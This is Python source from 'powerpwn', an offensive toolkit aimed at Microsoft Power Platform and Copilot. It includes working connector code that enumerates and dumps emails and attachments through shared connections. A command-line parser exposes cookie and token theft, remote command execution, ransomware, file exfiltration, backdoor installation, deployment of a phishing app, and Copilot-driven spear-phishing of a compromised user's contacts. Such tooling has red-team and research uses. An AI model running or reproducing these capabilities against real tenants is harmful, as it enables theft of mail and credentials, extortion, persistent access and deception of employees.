                                "starred": starred,
                                "fetchOnlyWithAttachments": fetch_only_with_attachments,
                                "includeAttachments": True,
                                "subject": "",
                            }

                            # Iterate over as many subjects as possible
                            get_email_success = True
                            while get_email_success:
                                get_email_success, _, get_email_val = request_and_verify(
                                    session=self._session,
                                    expected_status_prefix="200",
                                    method="get",
                                    url=f"{self._root}/Mail/LastReceived",
                                    params=params,
                                )

                                if get_email_success:
                                    if get_email_val.get("Id") not in unique_email_ids_seen:
                                        data_records.append(
                                            DataRecord(
                                                record_type=DataDumpType.email,
                                                record_id=get_email_val["Id"],
                                                record_name=get_email_val["Subject"],
                                                extra={k: v for k, v in get_email_val.items() if k not in {"Body", "Attachments"}},
                                            )
                                        )

                                        for attachment_obj in get_email_val["Attachments"]:
                                            data_records.append(
                                                DataRecord(
                                                    record_type=DataDumpType.attachment,
                                                    record_id=get_email_val["Id"],
                                                    record_name=attachment_obj["Name"],
                                                    extra={k: v for k, v in attachment_obj.items() if k not in {"ContentBytes"}},
                                                )
                                            )

                                        # avoid processing the same email twice
                                        unique_email_ids_seen.add(get_email_val["Id"])

                                    # Ignore identical subjects to continue iteration
                                    params["subject"] += f" -{get_email_val['Subject']}"

        return data_records

    def _dump(self, data_record: DataRecordWithContext) -> DataDump:
        if data_record.data_record.record_type == DataDumpType.email:
            success, _, get_email_val = request_and_verify(
                session=self._session,
                expected_status_prefix="200",
                method="get",
                url=f"{self._root}/Mail/{data_record.data_record.record_id}",
                params={"includeAttachments": False},
            )
            if success:
                extension = "html" if data_record.data_record.extra.get("IsHtml", False) else "txt"
                encoding = ENCODING
                content = get_email_val["Body"].encode(ENCODING)

        elif data_record.data_record.record_type == DataDumpType.attachment:
            success, _, get_email_val = request_and_verify(
                session=self._session,
                expected_status_prefix="200",
                method="get",
                url=f"{self._root}/Mail/{data_record.data_record.record_id}",
                params={"includeAttachments": True},
            )

            if success:
                for attachment_obj in get_email_val["Attachments"]:
                    if attachment_obj["Name"] == data_record.data_record.record_name:
                        extension = attachment_obj["ContentType"].partition('name="')[2].partition(".")[-1].replace('"', "")
                        encoding = None
                        content = attachment_obj["ContentBytes"]

                        # We are looking for a specific attachment
                        break
                else:
                    # Couldn't find relevant attachment
                    success = False
        else:
            raise ValueError(f"Unsupported data type: {data_record.data_record.record_type}.")

        if not success:
            raise ValueError(
                f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}."
            )

        data_dump = DataDump(extension=extension, encoding=encoding, content=content)
        return data_dump

    @classmethod
    def api_name(cls) -> str:
        return "shared_gmail"

    @classmethod
    def _apim_path(cls) -> str:
        return "gmail"



import base64
import io
import os
from typing import List

import PIL.Image as Image
import requests

from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors import API_NAME_TO_CONNECTOR_CLS
from powerpwn.powerdump.collect.data_collectors.enums.data_dump_source import DataDumpSource
from powerpwn.powerdump.collect.data_collectors.idata_collector import IDataCollector
from powerpwn.powerdump.collect.models.data_dump_entity import DataDumpWithContext
from powerpwn.powerdump.collect.models.data_store_entity import DataStoreWithContext
from powerpwn.powerdump.utils.model_loaders import get_connector, load_connections


class ConnectionsDataCollector(IDataCollector):
    def __init__(self, cache_path: str) -> None:
        self.__cache_path = cache_path

    def collect(self, session: requests.Session, env_id: str, output_dir_path: str) -> None:
        data_dumps: List[DataDumpWithContext] = []
        connections_dumps_root_dir = os.path.join(output_dir_path, DataDumpSource.connections.value)

        for connection in load_connections(cache_path=self.__cache_path, env_id=env_id):
            current_data_stores: List[DataStoreWithContext] = []
            connection_id = connection.connection_id
            api_name = connection.api_name

            connections_apis_dir = os.path.join(connections_dumps_root_dir, connection.api_name)
            if not connection.shareable:
                continue
            if api_name in API_NAME_TO_CONNECTOR_CLS:
                connection_dump_root_dir = os.path.join(connections_apis_dir, connection.connection_id)

                connector_cls = API_NAME_TO_CONNECTOR_CLS[api_name]
                spec = get_connector(self.__cache_path, connection.environment_id, connector_cls.api_name())

                connector_cls_instance = connector_cls(session=session, spec=spec, connection_id=connection_id)
                current_data_stores = connector_cls_instance.ping(connection_parameters=connection.connection_parameters)

                for data_store in current_data_stores:
                    data_records = connector_cls_instance.enum(data_store=data_store)
                    for data_record in data_records:
                        data_dump_type_dir = os.path.join(connection_dump_root_dir, data_record.data_record.record_type)
                        os.makedirs(data_dump_type_dir, exist_ok=True)
                        data_dump = connector_cls_instance.dump(data_record=data_record)
                        data_dump_path = os.path.join(data_dump_type_dir, f"{data_record.data_record.record_name}.{data_dump.data_dump.extension}")
                        encoding = data_dump.data_dump.encoding
                        extension = data_dump.data_dump.extension
                        content = data_dump.data_dump.content
                        if extension == "png":
                            self.__dump_png(content, data_dump_path)
                        else:
                            with open(data_dump_path, "w") as f:
                                content = content.decode(encoding) if encoding else content
                                f.write(content)
                        data_dumps.append(data_dump)

    def __dump_png(self, bytes: bytes, path: str) -> None:
        image_bytes = base64.b64decode(bytes)
        img = Image.open(io.BytesIO(image_bytes))
        img.save(path)



from typing import NamedTuple, Optional

from powerpwn.copilot.enums.copilot_scenario_enum import CopilotScenarioEnum
from powerpwn.copilot.enums.verbose_enum import VerboseEnum


class ChatArguments(NamedTuple):
    """
    Chat arguments model

    """

    user: str
    password: str
    use_cached_access_token: Optional[bool]
    scenario: CopilotScenarioEnum
    verbose: VerboseEnum



from typing import Literal

from powerpwn.nocodemalware.enums.command_to_run_enum import CommandToRunEnum
from powerpwn.nocodemalware.models.cmd_arguments import CommandArguments
from powerpwn.nocodemalware.models.code_exec_args_properties import CodeExecArgsProperties


class CodeExecCommandArgs(CommandArguments[CodeExecArgsProperties]):
    command_to_run: Literal[CommandToRunEnum.CODE_EXEC] = CommandToRunEnum.CODE_EXEC



from __future__ import annotations

from enum import Enum


class MessageTypeEnum(Enum):
    """
    Enum for websocket message type

    """

    user = 4
    ping = 6
    copilot = 1
    copilot_final = 2
    unknown = (
        3  # need to figure out {"type":3,"invocationId":"0"}    none = -1  # for now we are aware of {"protocol":"json","version":1} or {} messages
    )
    none = -1

    def from_int(value: int) -> MessageTypeEnum:
        if value == 4:
            return MessageTypeEnum.user
        elif value == 6:
            return MessageTypeEnum.ping
        elif value == 1:
            return MessageTypeEnum.copilot
        elif value == 2:
            return MessageTypeEnum.copilot_final
        elif value == 3:
            return MessageTypeEnum.unknown
        elif value == -1:
            return MessageTypeEnum.none
        else:
            raise ValueError(f"Invalid message type: {value}")



from powerpwn.common.file_browser.app import FileBrowserApp
from powerpwn.copilot.loggers.console_logger import ConsoleLogger


class Gui:
    def __init__(self) -> None:
        self.__console_logger = ConsoleLogger()

    def run(self, cache_path: str) -> None:
        self.__console_logger.log("Starting a localhost ..")
        self.__console_logger.log("To browse data navigate to http://127.0.0.1:8080")

        file_browser = FileBrowserApp(cache_path)
        file_browser.run(debug=False, host="0.0.0.0", port=8080)  # nosec



from __future__ import annotations

import argparse
import logging
from typing import TYPE_CHECKING

from powerpwn.copilot.enums.copilot_scenario_enum import CopilotScenarioEnum
from powerpwn.copilot.enums.verbose_enum import VerboseEnum
from powerpwn.nocodemalware.enums.code_exec_type_enum import CodeExecTypeEnum
from powerpwn.powerdoor.enums.action_type import BackdoorActionType
from powerpwn.powerdump.utils.const import CACHE_PATH

if TYPE_CHECKING:
    from argparse import _SubParsersAction


def module_gui(sub_parser: "_SubParsersAction[argparse.ArgumentParser]") -> None:
    gui_parser = sub_parser.add_parser("gui", description="Show collected resources and data.", help="Show collected resources and data via GUI.")
    gui_parser.add_argument("--cache-path", default=CACHE_PATH, type=str, help="Path to cached resources.")
    gui_parser.add_argument("-t", "--tenant", required=False, type=str, help="Tenant id to launch gui.")


def module_dump(sub_parser: "_SubParsersAction[argparse.ArgumentParser]") -> None:
    dump_parser = sub_parser.add_parser(
        "dump", description="Dump content for all available connection from recon", help="Dump content for all available connection from recon"
    )
    dump_parser.add_argument("-c", "--clear-cache", action="store_true", help="Clear local disk cache")
    dump_parser.add_argument("--cache-path", default=CACHE_PATH, help="Path to store collected resources and data.")
    dump_parser.add_argument("-t", "--tenant", required=False, type=str, help="Tenant id to connect.")
    dump_parser.add_argument("-g", "--gui", action="store_true", help="Run local server for gui.")
    dump_parser.add_argument("-r", "--recon", action="store_true", help="Run recon before dump. Should be used if recon command was not run before.")


def module_recon(sub_parser: "_SubParsersAction[argparse.ArgumentParser]") -> None:
    dump_parser = sub_parser.add_parser("recon", description="Recon for available data connections", help="Recon for available data connections.")
    dump_parser.add_argument("-c", "--clear-cache", action="store_true", help="Clear local disk cache")
    dump_parser.add_argument("--cache-path", default=CACHE_PATH, help="Path to store collected resources and data.")
    dump_parser.add_argument("-t", "--tenant", required=False, type=str, help="Tenant id to connect.")
    dump_parser.add_argument("-g", "--gui", action="store_true", help="Run local server for gui.")


def module_nocodemalware(command_subparsers: "_SubParsersAction[argparse.ArgumentParser]") -> None:
    nocodemalware_parser = command_subparsers.add_parser(
        "nocodemalware",
        description="Repurpose trusted execs, service accounts and cloud services to power a malware operation",
        help="Repurpose trusted execs, service accounts and cloud services to power a malware operation.",
    )
    nocodemalware_parser.add_argument(
        "-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform"
    )
    nocodemalware_subparsers = nocodemalware_parser.add_subparsers(help="nocodemalware_subcommand", dest="nocodemalware_subcommand")

    module_nocodemalware_subcommand_exec(nocodemalware_subparsers)


def module_nocodemalware_subcommand_exec(command_subparsers: "_SubParsersAction[argparse.ArgumentParser]") -> None:
    steal_fqdn_parser = command_subparsers.add_parser("steal-cookie", description="Steal cookie of fqdn")
    steal_fqdn_parser.add_argument("--fqdn", required=True, type=str, help="Fully qualified domain name to fetch the cookies of")

    command_subparsers.add_parser("steal-power-automate-token", description="Steal power automate token")

    execute_command_parser = command_subparsers.add_parser("command-exec", description="Execute command on machine")
    execute_command_parser.add_argument(
        "-t", "--type", required=True, type=str, choices=[cmd_type.value for cmd_type in CodeExecTypeEnum], help="Command type"
    )
    execute_command_parser.add_argument("-c", "--command-to-execute", required=True, type=str, help="Command to execute")

    ransomware_parser = command_subparsers.add_parser("ransomware", description="Ransomware")
    ransomware_parser.add_argument("--crawl_depth", required=True, type=str, help="Recursively search into subdirectories this many times")
    ransomware_parser.add_argument(
        "-k", "--encryption-key", required=True, type=str, help="an encryption key used to encrypt each file identified (AES256)"
    )
    ransomware_parser.add_argument(
        "--dirs", required=True, type=str, help="A list of directories to begin crawl from separated by a comma (e.g.'C:\\,D:\\')"
    )

    exfiltrate_file_parser = command_subparsers.add_parser("exfiltrate", description="Exfiltrate file")
    exfiltrate_file_parser.add_argument("-f", "--file", required=True, type=str, help="Absolute path to file")

    command_subparsers.add_parser("cleanup", description="Cleanup")


def module_backdoor(command_subparsers: "_SubParsersAction[argparse.ArgumentParser]") -> None:
    backdoor_parser = command_subparsers.add_parser(
        "backdoor", description="Install a backdoor on the target tenant.", help="Install a backdoor on the target tenant"
    )
    backdoor_parser.add_argument("-e", "--environment-id", required=True, type=str, help="Environment id in powerplatform.")
    backdoor_subparsers = backdoor_parser.add_subparsers(help="backdoor_subcommand", dest="backdoor_subcommand")

    ## Delete Flow parser ##
    delete_flow_parser = backdoor_subparsers.add_parser(
        BackdoorActionType.delete_flow.value, description="Deletes flow.", help="Deletes flow using installed backdoor flow."
    )
    delete_flow_parser.add_argument("-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform")
    delete_flow_parser.add_argument("-f", "--flow-id", type=str, help="Flow id to delete.")

    ## Create Flow parser ##
    create_flow_parser = backdoor_subparsers.add_parser(
        BackdoorActionType.create_flow.value, description="Creates a flow.", help="Creates a flow using installed backdoor flow."
    )
    create_flow_parser.add_argument("-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform")
    create_flow_parser.add_argument("-i", "--input", type=str, required=True, help="Path to flow details input file.")

    ## Get connections parser ##
    get_connections_parser = backdoor_subparsers.add_parser(
        BackdoorActionType.get_connections.value, description="Get connections", help="Gets connections details in environment"
    )
    get_connections_parser.add_argument(
        "-w", "--webhook-url", required=True, type=str, help="Webhook url to the flow factory installed in powerplatform"
    )
    get_connections_parser.add_argument("-o", "--output", type=str, default="", help="Path to output file.")

    ## backdoor installer parser ##
    installer = backdoor_subparsers.add_parser(
        BackdoorActionType.install_factory.value, description="Install flow factory", help="Installs flow factory in powerplatform"
    )
    installer.add_argument("-c", "--connection-id", required=True, type=str, help="The connection id of management connection")
    installer.add_argument("-t", "--tenant", required=False, type=str, help="Tenant id to connect.")


def module_phishing(command_subparsers: "_SubParsersAction[argparse.ArgumentParser]") -> None:
    phishing = command_subparsers.add_parser("phishing", description="Deploy a trustworthy phishing app", help="Deploy a trustworthy phishing app.")
    phishing_subparsers = phishing.add_subparsers(help="phishing_subcommand", dest="phishing_subcommand")

    installer = phishing_subparsers.add_parser(
        "install-app", description="Installs phishing app.", help="Installs a phishing app in the target environment."
    )
    installer.add_argument("-i", "--input", type=str, required=True, help="Path to app package zip file.")
    installer.add_argument("-t", "--tenant", required=False, type=str, help="Tenant id to connect.")
    installer.add_argument("-n", "--app-name", required=True, type=str, help="Display name of the app.")
    installer.add_argument("-e", "--environment-id", required=True, type=str, help="Environment id to install the app in.")

    app_share = phishing_subparsers.add_parser("share-app", description="Share app with organization", help="Share app with organization")
    app_share.add_argument("-a", "--app-id", required=True, type=str, help="App id to share")
    app_share.add_argument("-e", "--environment-id", required=True, type=str, help="Environment id that the app belongs to.")
    app_share.add_argument("-t", "--tenant", required=True, type=str, help="Tenant id to connect.")


def module_copilot(command_subparsers: "_SubParsersAction[argparse.ArgumentParser]") -> None:
    copilot = command_subparsers.add_parser(
        "copilot", description="Connects and interacts with copilot.", help="Connects and interacts with copilot."
    )
    copilot_subparsers = copilot.add_subparsers(help="copilot_subcommand", dest="copilot_subcommand")

    interactive_chat = copilot_subparsers.add_parser(
        "chat", description="Starts an interactive chat with copilot", help="Connects to copilot and starts an interactive chat session."
    )
    copilot_modules(interactive_chat)

    spearphishing = copilot_subparsers.add_parser(
        "spear-phishing",
        description="Starts a spearphishing using copilot",
        help="Targets a compromised user's collaborators and crafts personalized emails using copilot",
    )
    copilot_modules(spearphishing)

    whoami = copilot_subparsers.add_parser("whoami", description="Get the current user's information", help="Get the current user's information")
    copilot_modules(whoami)
    whoami.add_argument("-g", "--gui", action="store_true", help="Run local server for gui.")

    dump = copilot_subparsers.add_parser(
        "dump",
        description="Data dump using recon from whoami command",
        help="Dump of documents, emails, and other data from the recon of whoami command",
    )
    copilot_modules(dump)
    dump.add_argument("-d", "--directory", type=str, required=True, help="Path to whoami output directory")
    dump.add_argument("-g", "--gui", action="store_true", help="Run local server for gui.")

    gui = copilot_subparsers.add_parser(
        "gui", description="Browse data in a local server", help="Browse collected data in a simple gui on a local server"
    )
    gui.add_argument("-d", "--directory", type=str, required=True, help="Data directory")


def copilot_modules(parser: argparse.ArgumentParser) -> None:
    parser.add_argument("-u", "--user", required=True, type=str, help="User email to connect.")
    parser.add_argument("-p", "--password", required=False, type=str, help="User password to connect.")
    parser.add_argument("--cached-token", action="store_true", help="Use cached access token to connect to copilot if exists.")
    parser.add_argument(
        "-s", "--scenario", required=True, type=str, choices=[scenario_type.value for scenario_type in CopilotScenarioEnum], help="Scenario to run."
    )

    parser.add_argument(
        "-v",
        "--verbose",
        required=False,
        type=str,
        default=VerboseEnum.off.value,
        choices=[verbose_level.value for verbose_level in VerboseEnum],
        help="Verbose level. Default is off.",
    )


def module_copilot_studio(command_subparsers: "_SubParsersAction[argparse.ArgumentParser]") -> None:
    copilot = command_subparsers.add_parser(
        "copilot-studio-hunter", description="Scan, enumerate and recon Copilot Studio bots.", help="Scan, enumerate and recon Copilot Studio bots."
    )
    copilot_subparsers = copilot.add_subparsers(help="copilot_studio_subcommand", dest="copilot_studio_subcommand")

    deep_scan = copilot_subparsers.add_parser(
        "deep-scan",
        description="Starts a recon deep scan based on a domain or tenant. Requires FFUF to be installed.",
        help="Starts a recon deep scan based on a domain or tenant. Requires FFUF to be installed.",
    )
    copilot_studio_modules(deep_scan, "deep-scan")

    tools_recon = copilot_subparsers.add_parser(
        "tools-recon",
        description="Starts a recon scan for tools based on a url or a list of urls in a file.",
        help="Starts a recon scan for tools based on a url or a list of urls in a file.",
    )
    copilot_studio_modules(tools_recon, "tools-recon")

    enum = copilot_subparsers.add_parser(
        "enum",
        description="Starts enumerating for Azure tenant IDs or environments IDs.  Requires AMASS to be installed.",
        help="Starts enumerating for Azure tenant IDs or environments IDs. Requires AMASS to be installed.",
    )
    copilot_studio_modules(enum, "enum")


def copilot_studio_modules(parser: argparse.ArgumentParser, module: str) -> None:

    if module == "deep-scan":
        parser.add_argument("-r", "--rate", type=int, default=0, help="Rate limit in seconds between ffuf requests")
        parser.add_argument("-t", "--threads", type=int, default=40, help="Number of concurrent ffuf threads")
        parser.add_argument("--mode", choices=["verbose", "silent"], default="-s", help="Choose between verbose (-v) and silent (-s) mode for ffuf.")
        parser.add_argument("-tp", "--timeout_prefix", help="The timeout for the solution prefix scan to have (in seconds)", default=300)
        parser.add_argument(
            "-tb", "--timeout_bots", help="The timeout for each of the bot scans (one-word/two-word/three-word) to have (in seconds)", default=300
        )

        group = parser.add_mutually_exclusive_group(required=True)
        group.add_argument("-d", "--domain", type=str, help="The domain to query for tenant ID and run ffuf on")
        group.add_argument("-i", "--tenant-id", type=str, help="The tenant ID to run FFUF on")

    if module == "tools-recon":
        group = parser.add_mutually_exclusive_group(required=True)
        group.add_argument("-u", "--url", type=str, help="The URL to query for tools")
        group.add_argument("-i", "--input-file", type=str, help="The path to an input file with a list of URLs to query for tools")

    if module == "enum":
        parser.add_argument("-e", "--enumerate", choices=["environment", "tenant"], help="Run the enumeration function on environment or tenant")
        parser.add_argument("-t", "--timeout", help="The timeout for the enumeration process to have (in seconds)", default=300)


def module_powerpages(parser: "_SubParsersAction[argparse.ArgumentParser]") -> None:
    powerpages = parser.add_parser(
        "powerpages",
        description="Test anonymous access to dataverse tables via power pages, either via the apis or odata feeds.",
        help="Test anonymous access to dataverse tables via power pages, either via the apis or odata feeds.",
    )
    powerpages.add_argument(
        "-url",
        help="The url of the power pages domain to be tested. Format the url as such: 'https://<your_domain>.powerappsportals.com'",
        required=True,
    )


def parse_arguments() -> argparse.Namespace:
    parser = argparse.ArgumentParser()
    parser.add_argument("-l", "--log-level", default=logging.INFO, type=lambda x: getattr(logging, x), help="Configure the logging level.")
    command_subparsers: "_SubParsersAction[argparse.ArgumentParser]" = parser.add_subparsers(help="command", dest="command")

    module_dump(command_subparsers)
    module_recon(command_subparsers)
    module_gui(command_subparsers)
    module_backdoor(command_subparsers)
    module_nocodemalware(command_subparsers)
    module_phishing(command_subparsers)
    module_copilot(command_subparsers)
    module_copilot_studio(command_subparsers)
    module_powerpages(command_subparsers)

    args = parser.parse_args()

    return args



from typing import NamedTuple

from powerpwn.copilot.enums.message_type_enum import MessageTypeEnum


class WebsocketParsedMessage(NamedTuple):
    """
    Websocket parsed message model

    """

    copilot_message: str
    is_success: bool
    is_disengaged: bool
    suggestions: list
    type: MessageTypeEnum



import os

# Determine the directory containing the current script
current_script_dir = os.path.dirname(os.path.abspath(__file__))

# Move up one level to get to the project root (if the script is in a subdirectory)
project_root = os.path.dirname(current_script_dir)


def get_project_file_path(internal_path: str, filename: str) -> str:
    """
    Get the absolute path to a file within the project directory.

    :param internal_path: The relative path to the file from the project root
    :param filename: The file name
    :return: The absolute path to the file
    """
    return os.path.join(f"{project_root}/{internal_path}", filename)
